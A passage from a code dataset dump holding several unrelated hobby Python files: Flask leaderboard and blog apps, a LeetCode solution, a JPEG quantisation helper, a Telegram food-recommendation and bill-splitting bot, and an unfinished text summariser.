cgdata['score']\r\n league = leagueFinder[cgdata['league']['divisionIndex']]\r\n league = league.replace(\" \",\"\")\r\n player = cgdata['codingamer']\r\n country = player['countryId']\r\n language = cgdata['programmingLanguage']\r\n sub=\"No\"\r\n progress = cgdata['percentage']\r\n if progress != 100:\r\n sub=\"yes\"\r\n rank_progress=initial_rank(cgdata['pseudo'],leaderboard)-cgrank\r\n data.append([username,cgrank,lerank,points,league,language,country,sub,progress,rank_progress])\r\n except Exception as e:\r\n print(e)\r\n data.sort(key = lambda a:a[1])\r\n for p in range(len(data)):\r\n info.append([p+1,data[p][0],data[p][1],data[p][2],data[p][3],data[p][4],data[p][5],data[p][6],data[p][7],data[p][8],data[p][9]])\r\n if check_end_time(datetime.datetime.now()) == False:\r\n update_final(info)\r\n else:\r\n info=get_final()\r\n\r\ndef scrape_data_progression(fo):\r\n pr = fo\r\n pr.sort(key = lambda a: int(a[10])*-1)\r\n for i in range(len(pr)):\r\n pr[i][0] = i+1\r\n return pr\r\n@app.route(\"/\")\r\ndef main():\r\n try:\r\n createtable()\r\n except:\r\n print(\"table is already there\")\r\n try:\r\n createvoterlist()\r\n except:\r\n print(\"voter list is there\")\r\n try:\r\n createfirstleaderboard()\r\n except:\r\n print(\"Leaderboard table is there\")\r\n try:\r\n createfinalleaderboard()\r\n except:\r\n print(\"Final leaderboard table is already there\")\r\n return redirect(url_for(\"home\"))\r\n\r\n@app.route(\"/home\",methods=[\"GET\",\"POST\"])\r\ndef home():\r\n if request.method == \"GET\":\r\n return render_template(\"home.html\")\r\n else:\r\n log = request.form['sub']\r\n if log == \"Register\":\r\n return redirect(url_for(\"registeration\"))\r\n elif log == \"Leaderboard\":\r\n return redirect(url_for(\"leaderboard\"))\r\n else:\r\n return redirect(url_for(\"progression\"))\r\n\r\n@app.route(\"/registeration\",methods=[\"GET\",\"POST\"])\r\ndef registeration():\r\n if request.method == \"GET\":\r\n return render_template(\"register.html\",voting=check_time(datetime.datetime.now()))\r\n else:\r\n if check_re_time(datetime.datetime.now()):\r\n return render_template(\"Error.html\",code=\"You are late registration closed....\")\r\n name = request.form['id']\r\n try:\r\n vote = request.form['vote']\r\n except:\r\n if check_time(datetime.datetime.now()) == False:\r\n return render_template(\"Error.html\",code = f\"{name} you didn't vote.\")\r\n try:\r\n all_p=retrieveUsers()\r\n new=True\r\n for p in all_p:\r\n if p[0] == name:\r\n new=False\r\n break\r\n if new:\r\n insertUser(name)\r\n try:\r\n insertvote(vote)\r\n print(vote)\r\n except:\r\n pass\r\n else:\r\n return render_template(\"Error.html\",code=f\"{name} already registered....\")\r\n return redirect(url_for(\"leaderboard\"))\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"{name} can't register retry... error = {e}\")\r\n\r\n@app.route(\"/leaderboard\")\r\ndef leaderboard():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n bo=bot_programming_getter()\r\n msg=f\"The Contest is About {bo}\"\r\n p=len(set(part))\r\n end=\"\"\r\n if check_end_time(datetime.datetime.now()):\r\n end=\".Contest Ended.\"\r\n print(check_time(datetime.datetime.now()))\r\n print(check_end_time(datetime.datetime.now()))\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n if check_time(datetime.datetime.now()) == False:\r\n msg=\"Bot programming is a suspense..\"\r\n return render_template(\"leaderboard.html\",message=\"Total registered players = \"+str(p),msg=msg)\r\n return render_template(\"leaderboard.html\",players = info,message=\"Total registered players = \"+str(p)+end,msg=msg)\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"Error in retrieving users or taking data from CG,error = {e}\")\r\n\r\n@app.route(\"/progression\")\r\ndef progression():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n fo = scrape_data_progression(info)\r\n msg=f\"Leaderboard bassed on Progression\"\r\n p=len(set(part))\r\n end=\"\"\r\n if check_end_time(datetime.datetime.now()):\r\n end=\".Contest Ended.\"\r\n print(check_time(datetime.datetime.now()))\r\n print(check_end_time(datetime.datetime.now()))\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n if check_time(datetime.datetime.now()) == False:\r\n msg=\"Bot programming is a suspense..\"\r\n return render_template(\"leaderboard.html\",message=\"Total registered players = \"+str(p),msg=msg)\r\n return render_template(\"leaderboard.html\",players = fo,message=\"Total registered players = \"+str(p)+end,msg=msg)\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"Error in retrieving users or taking data from CG,error = {e}\")\r\n\r\n@app.route(\"/data\")\r\ndef data():\r\n try:\r\n part=retrieveUsers()\r\n print(part)\r\n votes=retrievevote()\r\n print(votes)\r\n return render_template(\"leaderboard.html\",players = part)\r\n except:\r\n return render_template(\"Error.html\",code=\"1\")\r\n\r\n@app.route(\"/before_leaderboard\")\r\ndef before_leaderboard():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n bo=bot_programming_getter()\r\n msg=f\"The Contest is About {bo}\"\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n return render_template(\"leaderboard.html\",players = info,msg=msg,message=str(datetime.datetime.now()))\r\n except:\r\n return render_template(\"Error.html\",code=\"Error in retrieving users or taking data from CG\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run()\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583394684","text":"from typing import List\n\nfrom python.base import BaseSolution\n\n\nclass ReverseString(BaseSolution):\n\n def test_cases(self):\n return [[\"A\", \"B\", \"C\", \"D\", \"E\"],\n [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]]\n\n def run(self, s: List[str]) -> List[str]:\n if len(s) == 1:\n return s\n max_times = len(s) // 2\n reverse_times = 0\n i, j = 0, len(s) - 1\n while reverse_times < max_times:\n s[i], s[j] = s[j], s[i]\n i += 1\n j -= 1\n reverse_times += 1\n return s\n","sub_path":"python/leetcode/string/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496047283","text":"from tab_jpeg import Q\r\nimport numpy as np\r\n\r\ndef codificadorQuantificacao (arr, q):\r\n \r\n imagem = arr.copy()\r\n \r\n for i in range(len(imagem)):\r\n imagem[i] = np.divide(imagem[i], (Q * fatorQualidade(q)))\r\n \r\n return np.rint(imagem)\r\n\r\n\r\ndef descodificadorQuantificacao (arr, q):\r\n \r\n imagem = arr.copy()\r\n \r\n for i in range(len(imagem)):\r\n imagem[i] = np.multiply(imagem[i], (Q * fatorQualidade(q)))\r\n \r\n return imagem\r\n\r\ndef fatorQualidade (q):\r\n if(q <= 50):\r\n a = 50.0 / q\r\n else:\r\n a = 2.0 - (q * 2.0)/100.0\r\n return a ","sub_path":"Quantificacao.py","file_name":"Quantificacao.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548297408","text":"from flask import render_template\r\nfrom app import app\r\n\r\nfrom flask import render_template, flash, redirect, url_for, request\r\nfrom app import app, db\r\nfrom app.models import User, Post\r\nfrom .forms import LoginForm, RegisterForm, EditProfileForm, CreatePostForm\r\nfrom flask_login import login_required, login_user, logout_user, current_user\r\nimport datetime\r\nimport time\r\nimport pytz\r\nimport feedparser\r\n\r\nCARDS_PER_PAGE = 5\r\n\r\n\r\n@app.before_request\r\ndef before_request():\r\n if current_user.is_authenticated:\r\n current_user.last_seen = datetime.datetime.utcnow()\r\n db.session.commit()\r\n\r\n\r\n# Главный адрес\r\n# Перенаправляет на /login, /admin, /counter\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Авторизация\r\n# Вход в аккаунт или переход к регистрации\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n user = User.query.filter_by(username=form.username.data).first()\r\n if user is None or not user.check_password(form.password.data):\r\n flash('Invalid username or password')\r\n return redirect(url_for('login'))\r\n\r\n login_user(user, remember=form.remember_me.data)\r\n\r\n if user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return render_template('login.html',\r\n title='Вход',\r\n form=form)\r\n\r\n\r\n# Выход из аккаунта\r\n# Выходит и пересылает на логин\r\n@app.route('/logout/')\r\ndef logout():\r\n logout_user()\r\n flash(\"Вы успешно вышли из аккаунта.\")\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Регистрация\r\n# Форма регистрации с редиректом на логин\r\n# Можно зарегаться только как юзер\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('index'))\r\n\r\n form = RegisterForm()\r\n\r\n if form.validate_on_submit():\r\n user = User(username=form.username.data)\r\n\r\n user.set_password(form.password.data)\r\n\r\n db.session.add(user)\r\n db.session.commit()\r\n\r\n flash('Вы зарегистрировались! Теперь можно входить.')\r\n return redirect(url_for('login'))\r\n\r\n return render_template('register.html',\r\n title='Регистрация',\r\n form=form)\r\n\r\n\r\n# Информация о любом пользователе\r\n@app.route('/user/')\r\n@login_required\r\ndef user(username):\r\n user = User.query.filter_by(username=username).first_or_404()\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n user.last_seen = utc.localize(user.last_seen).astimezone(msk).strftime(\"%d-%m-%Y %H:%M\")\r\n\r\n return render_template('user.html', user=user)\r\n\r\n\r\n# Редактирование профиля (для владельца или админа)\r\n@app.route('/edit-profile', methods=['GET', 'POST'])\r\ndef edit_profile():\r\n profile_id = request.args.get(\"id\", current_user.id, type=int)\r\n\r\n if current_user.id != profile_id and current_user.username != 'admin':\r\n return redirect(url_for('edit_profile', id=current_user.id))\r\n\r\n u = User.query.filter(User.id == profile_id).first()\r\n\r\n form = EditProfileForm()\r\n if form.validate_on_submit():\r\n u.username = form.username.data\r\n u.about_me = form.about_me.data\r\n\r\n if form.password.data != '':\r\n u.set_password(form.password.data)\r\n\r\n db.session.commit()\r\n\r\n flash('Ваши изменения сохранены!')\r\n return redirect(url_for('edit_profile', id=profile_id))\r\n elif request.method == 'GET':\r\n form.username.data = u.username\r\n form.password.data = ''\r\n form.about_me.data = u.about_me\r\n\r\n return render_template(\"edit-profile.html\",\r\n title='Редактировать профиль',\r\n user=u,\r\n form=form)\r\n\r\n\r\n# Админка (только для админов)\r\n# Позволяет просматривать инфу о пользователях и удалять профили\r\n@login_required\r\n@app.route('/admin')\r\ndef admin():\r\n if current_user.username != 'admin':\r\n return redirect(url_for('blog'))\r\n\r\n delete_id = request.args.get('delete', -1, type=int)\r\n if delete_id > -1:\r\n u = User.query.filter(User.id == delete_id).first()\r\n\r\n for t in u.posts.all():\r\n db.session.delete(t)\r\n\r\n db.session.delete(u)\r\n db.session.commit()\r\n\r\n flash('Пользователь удален!')\r\n return redirect(url_for('admin'))\r\n\r\n users_list = User.query.all()\r\n\r\n return render_template('admin.html',\r\n title='Админка',\r\n user=current_user,\r\n users_list=users_list)\r\n\r\n\r\n# Список постов с кнопкой удаления для админа\r\n@login_required\r\n@app.route('/manage')\r\ndef manage():\r\n if current_user.username != 'admin':\r\n return redirect(url_for('blog'))\r\n\r\n delete_id = request.args.get('delete', -1, type=int)\r\n if delete_id > -1:\r\n p = Post.query.filter(Post.id == delete_id).first()\r\n\r\n db.session.delete(p)\r\n db.session.commit()\r\n\r\n flash('Пост удален!')\r\n return redirect(url_for('manage'))\r\n\r\n posts = Post.query.all()\r\n\r\n return render_template('manage.html',\r\n title='Админка',\r\n user=current_user,\r\n posts=posts)\r\n\r\n\r\n# Написать новый пост\r\n@login_required\r\n@app.route('/create', methods=['GET', 'POST'])\r\ndef create_post():\r\n form = CreatePostForm()\r\n if form.validate_on_submit():\r\n post = Post(headline=form.headline.data,\r\n text=form.text.data,\r\n author=current_user\r\n )\r\n\r\n db.session.add(post)\r\n db.session.commit()\r\n\r\n flash('Новость добавлена на главную страницу!')\r\n return redirect(url_for('blog'))\r\n\r\n return render_template(\"create.html\",\r\n title='Добавить новость',\r\n user=current_user,\r\n form=form)\r\n\r\n\r\n# Страничка с постами пользователей и пагинацией\r\n@login_required\r\n@app.route('/blog')\r\ndef blog():\r\n page = request.args.get('page', 1, type=int)\r\n posts = Post.query.order_by(Post.timestamp.desc()).paginate(page, CARDS_PER_PAGE, False)\r\n\r\n next_url = url_for('blog', page=posts.next_num) \\\r\n if posts.has_next else None\r\n prev_url = url_for('blog', page=posts.prev_num) \\\r\n if posts.has_prev else None\r\n\r\n for p in posts.items:\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n p.time = utc.localize(p.timestamp).astimezone(msk)\r\n p.time = p.time.strftime(\"%d-%m-%Y %H:%M\")\r\n\r\n return render_template('blog.html',\r\n title='Блог',\r\n user=current_user,\r\n posts=posts.items,\r\n next_url = next_url,\r\n prev_url = prev_url\r\n )\r\n\r\n\r\n# Страничка с новостями\r\n@login_required\r\n@app.route('/news')\r\ndef news():\r\n page = request.args.get('page', 1, type=int)\r\n d = feedparser.parse('https://republic.ru/export/all.xml')\r\n\r\n next_url = url_for('news', page=page + 1)\r\n prev_url = url_for('news', page=page - 1) \\\r\n if page > 1 else None\r\n\r\n news_items = d.entries[((page - 1) * CARDS_PER_PAGE):(page * CARDS_PER_PAGE)]\r\n for n in news_items:\r\n t = datetime.datetime.fromtimestamp(time.mktime(n.published_parsed))\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n t = utc.localize(t).astimezone(msk)\r\n\r\n n.time = t.strftime(\"%d-%m-%Y %H:%M (MSK)\")\r\n\r\n return render_template('news.html',\r\n title='Новости',\r\n user=current_user,\r\n news = news_items,\r\n next_url=next_url,\r\n prev_url=prev_url\r\n )\r\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"128495655","text":"import telebot\nfrom telebot import types\n\nimport logging\nimport os\n\nimport telegram\nfrom telegram import Update, ForceReply, Message\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext\n\nimport decimal\nimport random\n\nTOKEN = \"\"\n\nbot = telebot.TeleBot(TOKEN)\nuser = bot.get_me()\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nPORT = int(os.environ.get('PORT', '8443'))\n\n# Define command handlers\ndef start(update, context):\n #select options\n reply_keyboard = [['Food recommendation \\U0001F924', 'Split my bills \\U0001F4B8']]\n update.message.reply_text(\"Hello, what would you like to do today?\", reply_markup = telegram.ReplyKeyboardMarkup(reply_keyboard,\n resize_keyboard = True,\n one_time_keyboard = True))\n\ndef back(update, context):\n options = [['Location', 'Cuisine']]\n update.message.reply_text(\"Looking for something to eat? Use the buttons below to filter by location or cuisine!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n resize_keyboard = True,\n one_time_keyboard = True))\n\ndef get_recommendation(update, context):\n options = [['Location', 'Cuisine']]\n update.message.reply_text(\"Looking for something to eat? Use the buttons below to filter by location or cuisine!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n resize_keyboard = True,\n one_time_keyboard = True))\n \ndef get_location(update, context):\n options = [['1. North', '2. Northeast', '3. East'], ['4. West', '5. Central', '/back']]\n update.message.reply_text(\"Please select your region or enter your postal code below! \\U0001F60B \\n\\nEg: /postalcode 123456\", reply_markup = telegram.ReplyKeyboardMarkup(options, resize_keyboard = True))\n\n #options = [['Region', 'Postal Code (to be updated)']]\n #update.message.reply_text(\"Please select your region or enter your postal code!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n #resize_keyboard = True,\n #one_time_keyboard = True)) \ndef get_postalcd(update, context):\n update.message.reply_text(\"Enter your postal code below! \\U0001F60B \\nEg: /postalcode 123456\")\n\ndef postalcode(update, context):\n userinput = update.message.text.split(\" \")\n pc = userinput[1]\n places = open('everything.txt').read()\n para = places.split('\\n\\n')\n random.shuffle(para)\n output = []\n for i in para:\n before, key, after = i.partition('Singapore')\n if after[1:3] == pc[0:2] :\n output.append(i + \"\\n\\n\")\n\n if len(output) > 5:\n final = output[0:5]\n else:\n final = output\n\n str1 = ''\n \n result = ''\n if len(pc) != 6:\n result = \"Invalid postal code entered! Please try again.\"\n elif len(final) == 0:\n result = \"No recommendations at the moment! We will work to expand our database.\"\n else:\n result = \"Here are some food places near you! \\U0001F929 \\n\\n\" + str1.join(final)\n \n update.message.reply_text(result, parse_mode = 'HTML', disable_web_page_preview = True)\n \n\ndef food_near_pc(update, context):\n update.message.reply_text('to be updated')\n ##TODO\n\ndef get_region(update, context):\n options = [['1. North', '2. Northeast', '3. East'], ['4. West', '5. Central', '/back']]\n update.message.reply_text(\"Where are you now? \\U0001F914\", reply_markup = telegram.ReplyKeyboardMarkup(options, resize_keyboard = True))\n\ndef get_cuisine(update, context):\n options = [['Chinese', 'Malay', 'Indian'], ['Western', 'Thai', 'Others']]\n update.message.reply_text(\"Select what you're craving for!\", reply_markup = telegram.ReplyKeyboardMarkup(options, \n resize_keyboard = True))\n \ndef random_shuffle(fname):\n lines = open(fname).read()\n paragraphs = lines.split('\\n\\n')\n random.shuffle(paragraphs)\n i = 0\n output = \"\"\n while i < 3:\n output = output + paragraphs[i] + \"\\n\\n\"\n i = i + 1\n return output\n\ndef get_north(update, context):\n #file = open('north.txt')\n north_food = random_shuffle('north.txt')\n update.message.reply_text('List of food recommendations in the North! \\n\\n' + north_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_northeast(update, context):\n #file = open('northeast.txt')\n northeast_food = random_shuffle('northeast.txt')\n update.message.reply_text('List of food recommendations in the Northeast! \\n\\n' + northeast_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_east(update, context):\n #file = open('east.txt')\n east_food = random_shuffle('east.txt')\n update.message.reply_text('List of food recommendations in the East! \\n\\n' + east_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_west(update, context):\n #file = open('west.txt')\n west_food = random_shuffle('west.txt')\n update.message.reply_text('List of food recommendations in the West! \\n\\n' + west_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_central(update, context):\n #file = open('central.txt')\n central_food = random_shuffle('central.txt')\n update.message.reply_text('List of food recommendations in Central! \\n\\n' + central_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef filter_cuisine(fname, input_text):\n lines = open(fname).read()\n paragraphs = lines.split('\\n\\n')\n random.shuffle(paragraphs)\n filtered = \"\"\n for p in paragraphs:\n if input_text in p:\n filtered += p + \"\\n\\n\"\n filtered_1 = filtered[0:-4]\n new_file = filtered_1.split('\\n\\n')\n random.shuffle(new_file)\n i = 0\n output = \"\"\n while i < 3:\n output = output + new_file[i] + \"\\n\\n\"\n i = i + 1\n return output \n \ndef get_chinese(update, context):\n input_text = \"Chinese\"\n chinese_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Chinese food recommendations! \\n\\n' + chinese_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_malay(update, context):\n input_text = \"Malay\"\n malay_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Malay food recommendations! \\n\\n' + malay_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_indian(update, context):\n input_text = \"Indian\"\n indian_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Indian food recommendations! \\n\\n' + indian_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_western(update, context):\n input_text = \"Western\"\n western_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Western food recommendations! \\n\\n' + western_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_thai(update, context):\n input_text = \"Thai\"\n thai_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Thai food recommendations! \\n\\n' + thai_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_others(update, context):\n other_food = random_shuffle('others.txt')\n update.message.reply_text('Here are some more food recommendations! \\n\\n' + other_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef split_bills(update, context):\n update.message.reply_text(\"Please enter each person and their amount paid in the following format:\" +\n \"\\n /calculate Name Amount Name Amount\" + \n \"\\n\\n E.G. /calculate james 1.20 jason 5.80 jess 0\") \n \n# Calculate Bill\ndef calculate(update: Update, _: CallbackContext) -> None:\n \"\"\"Splits the bill\"\"\"\n all_words = update.message.text.split(\" \")\n #all_words = [\"/calculate\", \"Name\", \"Amt\", \"Name\"] //in strings\n\n #converting to list of integers\n terms = list(all_words[1:])\n names = []\n amounts = []\n i = 0\n while i < len(terms):\n if i % 2 == 0:\n names.append(terms[i])\n i = i + 1\n else:\n try:\n amounts.append(decimal.Decimal(terms[i]))\n i = i + 1\n except decimal.InvalidOperation:\n amounts = \"Error! Invalid expression entered, please check and ensure names doesn't have spacings and amounts don't include $.\"\n break\n \n if type(amounts) is not str:\n # total amount to pay\n total = sum(amounts)\n\n # amount per person\n decimal.getcontext().prec = 3\n ave_amt = decimal.Decimal(total / len(names))\n\n # amount to pay/receive\n diffs = [ave_amt - amnt for amnt in amounts]\n \n to_pay = \"\"\n index = 0\n while index < len(names):\n if diffs[index] > 0:\n to_pay = to_pay + (\"\\n\" + names[index] + \" should pay $\" + str(diffs[index]))\n index += 1\n elif diffs[index] == 0:\n to_pay = to_pay + (\"\\n\" + names[index] + \" does not have to pay\")\n index += 1\n else:\n to_pay = to_pay + (\"\\n\" + names[index] + \" should receive $\" + str(diffs[index]*(-1)))\n index += 1\n \n #return response\n update.message.reply_text(f\"{to_pay}\")\n else:\n update.message.reply_text(f\"{amounts}\")\n \ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(TOKEN)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"back\", back))\n dispatcher.add_handler(CommandHandler(\"postal_code\", get_postalcd))\n dispatcher.add_handler(CommandHandler(\"postalcode\", postalcode))\n dispatcher.add_handler(CommandHandler(\"region\", get_region))\n dispatcher.add_handler(CommandHandler(\"cuisine\", get_cuisine))\n dispatcher.add_handler(CommandHandler(\"split_bills\", split_bills))\n dispatcher.add_handler(CommandHandler(\"calculate\", calculate))\n\n # on non command i.e message - echo the message on Telegram\n dispatcher.add_handler(MessageHandler(Filters.regex('Food recommendation \\U0001F924'), get_recommendation))\n dispatcher.add_handler(MessageHandler(Filters.regex('Split my bills \\U0001F4B8'), split_bills))\n dispatcher.add_handler(MessageHandler(Filters.regex('Postal Code'), get_postalcd))\n dispatcher.add_handler(MessageHandler(Filters.regex('Region'), get_region))\n dispatcher.add_handler(MessageHandler(Filters.regex('1. North'), get_north))\n dispatcher.add_handler(MessageHandler(Filters.regex('2. Northeast'), get_northeast))\n dispatcher.add_handler(MessageHandler(Filters.regex('3. East'), get_east))\n dispatcher.add_handler(MessageHandler(Filters.regex('4. West'), get_west))\n dispatcher.add_handler(MessageHandler(Filters.regex('5. Central'), get_central))\n dispatcher.add_handler(MessageHandler(Filters.regex('Location'), get_location))\n dispatcher.add_handler(MessageHandler(Filters.regex('Cuisine'), get_cuisine))\n dispatcher.add_handler(MessageHandler(Filters.regex('Chinese'), get_chinese))\n dispatcher.add_handler(MessageHandler(Filters.regex('Malay'), get_malay))\n dispatcher.add_handler(MessageHandler(Filters.regex('Indian'), get_indian))\n dispatcher.add_handler(MessageHandler(Filters.regex('Western'), get_western))\n dispatcher.add_handler(MessageHandler(Filters.regex('Thai'), get_thai))\n dispatcher.add_handler(MessageHandler(Filters.regex('Others'), get_others))\n \n # Start the Bot\n updater.start_polling()\n## updater.start_webhook(listen=\"0.0.0.0\",\n## port=int(PORT),\n## url_path=TOKEN,\n## webhook_url='https://foodiefriendsbot.herokuapp.com/' + TOKEN)\n## updater.bot.set_webhook(url=settings.WEBHOOK_URL)\n## updater.bot.set_webhook(\"foodiefriendsbot\" + TOKEN)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","sub_path":"milestone3/foodiefriends.py","file_name":"foodiefriends.py","file_ext":"py","file_size_in_byte":14464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"553363674","text":"import sys\nimport os\nimport math\nimport html2text\nimport operator\nimport itertools\nimport operator\nfrom nltk import tokenize\nfrom nltk.corpus import stopwords, wordnet as wn\nimport crf_test\n# \n# python k-mix-model.py unannotated-text.txt\n# Pg 139 / 207 in thesis\n#\n\nKMM_TRAIN_FOLDER = '../kmix_train'\n# KMM_TRAIN_FOLDER = '../FullText_html/'\n\nstopword_set = set(stopwords.words('english'))\nstopword_set.add('[')\n\ndef extractorData(html):\n\t# dummy list\n\tstart = 0\n\ttokenized= tokenizeSentence(html)\n\t# The Judgment was delivered by / 'for educational use only'\n\twhile 'the judgment was delivered by' not in tokenized[start].lower() \\\n\t\tand 'for educational use only' not in tokenized[start].lower():\n\t\tstart = start + 1\n\tans=[]\n\tfor i in range(start+1, len(tokenized)):\n\t\tif 'thomson reuters' in tokenized[i]:\n\t\t\tbreak\n\t\tans.append(tokenized[i])\n\treturn ans\n\n\ndef accumulate(l):\n\t'''\n\t\tGroup By Key\n\t'''\n\tit = itertools.groupby(l, operator.itemgetter(0))\n\tfor key, subiter in it:\n\t\tyield key, sum(item[1] for item in subiter)\n\n\ndef find_nth(haystack, needle, n):\n\tstart = haystack.find(needle)\n\twhile start >= 0 and n > 1:\n\t\tstart = haystack.find(needle, start+len(needle))\n\t\tn -= 1\n\treturn start\n\n# Don't process tags, just strip them out. Use an indent of 4 spaces \n# and a page that's 80 characters wide.\n\n# 1st Tokenize and form sentence\ndef tokenizeSentence(fileContent):\n \"\"\"\n :param fileContent: fileContent is the file content which needs to be summarized\n :return: Returns a list of string(sentences)\n \"\"\"\n return tokenize.sent_tokenize(fileContent)\n\n\n# 2nd Case Folding\ndef caseFolding(line):\n \"\"\"\n :param line is the input on which case folding needs to be done\n :return: Line with all characters in lower case\n \"\"\"\n return line.lower()\n\n\n# 3rd Tokenize and form tokens from sentence\ndef tokenizeLine(sentence):\n \"\"\"\n :param sentence: Sentence is the english sentence of the file\n :return: List of tokens\n \"\"\"\n return tokenize.word_tokenize(sentence)\n\n\n# 4th Stop Word Removal\ndef stopWordRemove(tokens):\n \"\"\"\n :param tokens: List of Tokens\n :return: List of tokens after removing stop words\n \"\"\"\n list_tokens = []\n for token in tokens:\n if (token not in stopword_set) and (token != '.') and (token != ','):\n list_tokens.append(token)\n return list_tokens\n\ndef KMM(eval_file):\n\n\ttraining = os.listdir(KMM_TRAIN_FOLDER)\n\tlistOfData=[]\n\tmaxof=0\n\tnameof=None\n\n\tfor file in training:\n\t\twith open('./'+KMM_TRAIN_FOLDER+'/'+file, 'r') as f:\n\t\t\ttxt = f.read()\n\n\t\ttxt=(txt.replace('\\\"\\']|\\\"[^\\\"]*\\\"|\\'[^\\']*\\')*>',''))\n\t\tif(len(txt)>maxof):\n\t\t\tmaxof=len(txt)\n\t\t\tnameof=file\n\n\t\tconverted_text = html2text.html2text(txt)\n\t\tlistOfData.append(caseFolding(converted_text))\n\n\t# print(nameof, '\\n', maxof)\n\n\twith open(eval_file, 'r') as f:\n\t\tmysentences = f.readlines()\n\t# mysentences, _ = crf_test.parse_html(eval_file)\n\n\tmysentences_id=None\n\tidx=1\n\n\tt2 = [caseFolding(sentence) for sentence in mysentences]\n\tmysentences = t2\n\n\tindex={}\n\tlistOfSentences=[]\n\tdocId=1\n\tstartReading=False\n\n\n\tfor file in listOfData:\n\t\tsentences = extractorData(file)\n\t\t\n\t\tfor sentence in sentences:\n\t\t\tsentence=sentence.strip()\n\t\t\tif len(sentence)==0:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\ttokens=tokenizeLine(sentence)\n\t\t\t\tfinal_tokens=stopWordRemove(tokens)\n\t\t\t\tfor token in final_tokens:\n\t\t\t\t\tif token not in index:\n\t\t\t\t\t\tindex[token]= []\n\n\t\t\t\t\tindex[token].append( (docId, 1) )\n\t\tdocId=docId+1\n\t\n\tfor key in index:\n\t\tgetList=index[key]\n\t\tindex[key]=list(accumulate(getList))\n\t\tif len(getList) > 2:\n\t\t\tprint(key, '=>', index[key])\n\t\t\tprint(index[key])\n\n\tprint(len(index))\n\tN, cf, tf, df = 360, 0, 0, 0\n\tnum= 